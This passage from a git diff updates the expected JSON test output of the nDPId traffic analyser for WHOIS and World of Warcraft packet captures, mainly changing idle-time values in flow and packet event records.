HJhbnNmZXJQcm9oaWJpdGVkDQogICBOYW1lIFNlcnZlcjogTlMyNS5FSUNSQS5ORVQNCiAgIE5hbWUgU2VydmVyOiBOUzI2LkVJQ1JBLk5FVA0KICAgRE5TU0VDOiB1bnNpZ25lZA0KICAgVVJMIG9mIHRoZSBJQ0FOTiBXaG9pcyBJbmFjY3VyYWN5IENvbXBsYWludCBGb3JtOiBodHRwczovL3d3dy5pY2Fubi5vcmcvd2ljZi8NCj4+PiBMYXN0IHVwZGF0ZSBvZiB3aG9pcyBkYXRhYmFzZTogMjAyMS0wNi0xMlQxNjowMDo1NlogPDw8DQoNCkZvciBtb3JlIGluZm9ybWF0aW9uIG9uIFdob2lzIHN0YXR1cyBjb2RlcywgcGxlYXNlIHZpc2l0IGh0dHBzOi8vaWNhbm4ub3JnL2VwcA0KDQpOT1RJQ0U6IFRoZSBleHBpcmF0aW9uIGRhdGUgZGlzcGxheWVkIGluIHRoaXMgcmVjb3JkIGlzIHRoZSBkYXRlIHRoZQ0KcmVnaXN0cmFyJ3Mgc3BvbnNvcnNoaXAgb2YgdGhlIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiBpbiB0aGUgcmVnaXN0cnkgaXMNCmN1cnJlbnRseSBzZXQgdG8gZXhwaXJlLiBUaGlzIGRhdGUgZG9lcyBub3QgbmVjZXNzYXJpbHkgcmVmbGVjdCB0aGUgZXhwaXJhdGlvbg0KZGF0ZSBvZiB0aGUgZG9tYWluIG5hbWUgcmVnaXN0cmFudCdzIGFncg=="} -02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2Mf8AAAtBonHwB4tHgqgP4AAK8\/hR0ribdStrBVQGAW06F4AAGVlbWVudCB3aXRoIHRoZSBzcG9uc29yaW5nDQpyZWdpc3RyYXIuICBVc2VycyBtYXkgY29uc3VsdCB0aGUgc3BvbnNvcmluZyByZWdpc3RyYXIncyBXaG9pcyBkYXRhYmFzZSB0bw0KdmlldyB0aGUgcmVnaXN0cmFyJ3MgcmVwb3J0ZWQgZGF0ZSBvZiBleHBpcmF0aW9uIGZvciB0aGlzIHJlZ2lzdHJhdGlvbi4NCg0KVEVSTVMgT0YgVVNFOiBZb3UgYXJlIG5vdCBhdXRob3JpemVkIHRvIGFjY2VzcyBvciBxdWVyeSBvdXIgV2hvaXMNCmRhdGFiYXNlIHRocm91Z2ggdGhlIHVzZSBvZiBlbGVjdHJvbmljIHByb2Nlc3NlcyB0aGF0IGFyZSBoaWdoLXZvbHVtZSBhbmQNCmF1dG9tYXRlZCBleGNlcHQgYXMgcmVhc29uYWJseSBuZWNlc3NhcnkgdG8gcmVnaXN0ZXIgZG9tYWluIG5hbWVzIG9yDQptb2RpZnkgZXhpc3RpbmcgcmVnaXN0cmF0aW9uczsgdGhlIERhdGEgaW4gVmVyaVNpZ24gR2xvYmFsIFJlZ2lzdHJ5DQpTZXJ2aWNlcycgKCJWZXJpU2lnbiIpIFdob2lzIGRhdGFiYXNlIGlzIHByb3ZpZGVkIGJ5IFZlcmlTaWduIGZvcg0KaW5mb3JtYXRpb24gcHVycG9zZXMgb25seSwgYW5kIHRvIGFzc2lzdCBwZXJzb25zIGluIG9idGFpbmluZyBpbmZvcm1hdGlvbg0KYWJvdXQgb3IgcmVsYXRlZCB0byBhIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiByZWNvcmQuIFZlcmlTaWduIGRvZXMgbm90DQpndWFyYW50ZWUgaXRzIGFjY3VyYWN5LiBCeSBzdWJtaXR0aW5nIGEgV2hvaXMgcXVlcnksIHlvdSBhZ3JlZSB0byBhYmlkZQ0KYnkgdGhlIGZvbGxvd2luZyB0ZXJtcyBvZiB1c2U6IFlvdSBhZ3JlZSB0aGF0IHlvdSBtYXkgdXNlIHRoaXMgRGF0YSBvbmx5DQpmb3IgbGF3ZnVsIHB1cnBvc2VzIGFuZCB0aGF0IHVuZGVyIG5vIGNpcmN1bXN0YW5jZXMgd2lsbCB5b3UgdXNlIHRoaXMgRGF0YQ0KdG86ICgxKSBhbGxvdywgZW5hYmxlLCBvciBvdGhlcndpc2Ugc3VwcG9ydCB0aGUgdHJhbnNtaXNzaW9uIG9mIG1hc3MNCnVuc29saWNpdGVkLCBjb21tZXJjaWFsIGFkdmVydGlzaW5nIG9yIHNvbGljaXRhdGlvbnMgdmlhIGUtbWFpbCwgdGVsZXBob25lLA0Kb3IgZmFjc2ltaWxlOyBvciAoMikgZW5hYmxlIGhpZ2ggdm9sdW1lLCBhdXRvbWF0ZWQsIGVsZWN0cm9uaWMgcHJvY2Vzc2VzDQp0aGF0IGFwcGx5IHRvIFZlcmlTaWduIChvciBpdHMgY29tcHV0ZXIgc3lzdGVtcykuIFRoZSBjb21waWxhdGlvbiwNCnJlcGFja2FnaW5nLA=="} -00926{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623517268690,"flow_last_seen":1623517268690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623517268690,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623517268690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":62,"pkt_l4_len":24,"thread_ts_msec":1623517268690,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAALKUxAAAtBrE+wB4tHgqgP4AAK8\/hR0rdvNStq\/tgEgW05awAAAIEBVA="} +02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623517269021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2B35AAAtBjPLwB4tHgqgP4AAK8\/hR0rdvdStrBVQGAW0T9cAACAgIERvbWFpbiBOYW1lOiBDWUJFUlBBVFJPTEJELkNPTQ0KICAgUmVnaXN0cnkgRG9tYWluIElEOiAyMTUzNDAwMTAwX0RPTUFJTl9DT00tVlJTTg0KICAgUmVnaXN0cmFyIFdIT0lTIFNlcnZlcjogd2hvaXMuUHVibGljRG9tYWluUmVnaXN0cnkuY29tDQogICBSZWdpc3RyYXIgVVJMOiBodHRwOi8vd3d3LnB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgVXBkYXRlZCBEYXRlOiAyMDIwLTA4LTI5VDA3OjQxOjUyWg0KICAgQ3JlYXRpb24gRGF0ZTogMjAxNy0wOC0xNFQxNjoxMDo1MVoNCiAgIFJlZ2lzdHJ5IEV4cGlyeSBEYXRlOiAyMDIxLTA4LTE0VDE2OjEwOjUxWg0KICAgUmVnaXN0cmFyOiBQRFIgTHRkLiBkL2IvYSBQdWJsaWNEb21haW5SZWdpc3RyeS5jb20NCiAgIFJlZ2lzdHJhciBJQU5BIElEOiAzMDMNCiAgIFJlZ2lzdHJhciBBYnVzZSBDb250YWN0IEVtYWlsOiBhYnVzZS1jb250YWN0QHB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgUmVnaXN0cmFyIEFidXNlIENvbnRhY3QgUGhvbmU6ICsxLjIwMTM3NzU5NTINCiAgIERvbWFpbiBTdGF0dXM6IGNsaWVudFRyYW5zZmVyUHJvaGliaXRlZCBodHRwczovL2ljYW5uLm9yZy9lcHAjY2xpZW50VHJhbnNmZXJQcm9oaWJpdGVkDQogICBOYW1lIFNlcnZlcjogTlMyNS5FSUNSQS5ORVQNCiAgIE5hbWUgU2VydmVyOiBOUzI2LkVJQ1JBLk5FVA0KICAgRE5TU0VDOiB1bnNpZ25lZA0KICAgVVJMIG9mIHRoZSBJQ0FOTiBXaG9pcyBJbmFjY3VyYWN5IENvbXBsYWludCBGb3JtOiBodHRwczovL3d3dy5pY2Fubi5vcmcvd2ljZi8NCj4+PiBMYXN0IHVwZGF0ZSBvZiB3aG9pcyBkYXRhYmFzZTogMjAyMS0wNi0xMlQxNjowMDo1NlogPDw8DQoNCkZvciBtb3JlIGluZm9ybWF0aW9uIG9uIFdob2lzIHN0YXR1cyBjb2RlcywgcGxlYXNlIHZpc2l0IGh0dHBzOi8vaWNhbm4ub3JnL2VwcA0KDQpOT1RJQ0U6IFRoZSBleHBpcmF0aW9uIGRhdGUgZGlzcGxheWVkIGluIHRoaXMgcmVjb3JkIGlzIHRoZSBkYXRlIHRoZQ0KcmVnaXN0cmFyJ3Mgc3BvbnNvcnNoaXAgb2YgdGhlIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiBpbiB0aGUgcmVnaXN0cnkgaXMNCmN1cnJlbnRseSBzZXQgdG8gZXhwaXJlLiBUaGlzIGRhdGUgZG9lcyBub3QgbmVjZXNzYXJpbHkgcmVmbGVjdCB0aGUgZXhwaXJhdGlvbg0KZGF0ZSBvZiB0aGUgZG9tYWluIG5hbWUgcmVnaXN0cmFudCdzIGFncg=="} +02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623517269021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2Mf8AAAtBonHwB4tHgqgP4AAK8\/hR0ribdStrBVQGAW06F4AAGVlbWVudCB3aXRoIHRoZSBzcG9uc29yaW5nDQpyZWdpc3RyYXIuICBVc2VycyBtYXkgY29uc3VsdCB0aGUgc3BvbnNvcmluZyByZWdpc3RyYXIncyBXaG9pcyBkYXRhYmFzZSB0bw0KdmlldyB0aGUgcmVnaXN0cmFyJ3MgcmVwb3J0ZWQgZGF0ZSBvZiBleHBpcmF0aW9uIGZvciB0aGlzIHJlZ2lzdHJhdGlvbi4NCg0KVEVSTVMgT0YgVVNFOiBZb3UgYXJlIG5vdCBhdXRob3JpemVkIHRvIGFjY2VzcyBvciBxdWVyeSBvdXIgV2hvaXMNCmRhdGFiYXNlIHRocm91Z2ggdGhlIHVzZSBvZiBlbGVjdHJvbmljIHByb2Nlc3NlcyB0aGF0IGFyZSBoaWdoLXZvbHVtZSBhbmQNCmF1dG9tYXRlZCBleGNlcHQgYXMgcmVhc29uYWJseSBuZWNlc3NhcnkgdG8gcmVnaXN0ZXIgZG9tYWluIG5hbWVzIG9yDQptb2RpZnkgZXhpc3RpbmcgcmVnaXN0cmF0aW9uczsgdGhlIERhdGEgaW4gVmVyaVNpZ24gR2xvYmFsIFJlZ2lzdHJ5DQpTZXJ2aWNlcycgKCJWZXJpU2lnbiIpIFdob2lzIGRhdGFiYXNlIGlzIHByb3ZpZGVkIGJ5IFZlcmlTaWduIGZvcg0KaW5mb3JtYXRpb24gcHVycG9zZXMgb25seSwgYW5kIHRvIGFzc2lzdCBwZXJzb25zIGluIG9idGFpbmluZyBpbmZvcm1hdGlvbg0KYWJvdXQgb3IgcmVsYXRlZCB0byBhIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiByZWNvcmQuIFZlcmlTaWduIGRvZXMgbm90DQpndWFyYW50ZWUgaXRzIGFjY3VyYWN5LiBCeSBzdWJtaXR0aW5nIGEgV2hvaXMgcXVlcnksIHlvdSBhZ3JlZSB0byBhYmlkZQ0KYnkgdGhlIGZvbGxvd2luZyB0ZXJtcyBvZiB1c2U6IFlvdSBhZ3JlZSB0aGF0IHlvdSBtYXkgdXNlIHRoaXMgRGF0YSBvbmx5DQpmb3IgbGF3ZnVsIHB1cnBvc2VzIGFuZCB0aGF0IHVuZGVyIG5vIGNpcmN1bXN0YW5jZXMgd2lsbCB5b3UgdXNlIHRoaXMgRGF0YQ0KdG86ICgxKSBhbGxvdywgZW5hYmxlLCBvciBvdGhlcndpc2Ugc3VwcG9ydCB0aGUgdHJhbnNtaXNzaW9uIG9mIG1hc3MNCnVuc29saWNpdGVkLCBjb21tZXJjaWFsIGFkdmVydGlzaW5nIG9yIHNvbGljaXRhdGlvbnMgdmlhIGUtbWFpbCwgdGVsZXBob25lLA0Kb3IgZmFjc2ltaWxlOyBvciAoMikgZW5hYmxlIGhpZ2ggdm9sdW1lLCBhdXRvbWF0ZWQsIGVsZWN0cm9uaWMgcHJvY2Vzc2VzDQp0aGF0IGFwcGx5IHRvIFZlcmlTaWduIChvciBpdHMgY29tcHV0ZXIgc3lzdGVtcykuIFRoZSBjb21waWxhdGlvbiwNCnJlcGFja2FnaW5nLA=="} +00926{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":23,"packets-processed":23,"total-skipped-flows":0,"total-l4-data-len":4920,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1623517269021} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 23/23 diff --git a/test/results/wow.pcap.out b/test/results/wow.pcap.out index 8a53bafaa..b8723370d 100644 --- a/test/results/wow.pcap.out +++ b/test/results/wow.pcap.out @@ -1,36 +1,36 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"wow.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"wow.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1437858769436} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858769436,"flow_last_seen":1437858769436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858769436,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437858769436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769436,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJNAAIAGhLXAqLIUDIHeNZmNAFBo+hN9AAAAAKACIADawAAAAgQFtAEDAwIEAggKACnZUgAAAAA="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437858769437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769437,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJNAAIAGhLXAqLIUDIHeNZmNAFBo+hN9AAAAAKACIADawAAAAgQFtAEDAwIEAggKACnZUgAAAAA="} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858769451,"flow_last_seen":1437858769451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858769451,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437858769451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769451,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1437858769452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769452,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437858769649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769649,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG6kgMgd41wKiyFABQmY301K7baPoTfqASFqCzawAAAgQFhAQCCAqn1+VGACnZUgEDAwc="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769436,"flow_last_seen":1437858769651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1437858769651,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437858769673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1437858769673,"pkt":"JGURQGHhJGUR0Ik6CABFAAAwGJRAAHEGSPkYaR0VwKiyFABQmZCXtfydBIffHXASIACqLAAAAgQFhAQCAAA="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769451,"flow_last_seen":1437858769820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1437858769820,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"launcher.worldofwarcraft.com","url":"launcher.worldofwarcraft.com\/alert","code":0,"content_type":"","user_agent":""}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858780584,"flow_last_seen":1437858780584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858780584,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437858780584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1437858780584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1437858780796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780796,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmaEZw7OGrM1zDqASOJCV8gAAAgQFhAQCCApCuV\/iACndrQEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858780584,"flow_last_seen":1437858781018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858781018,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 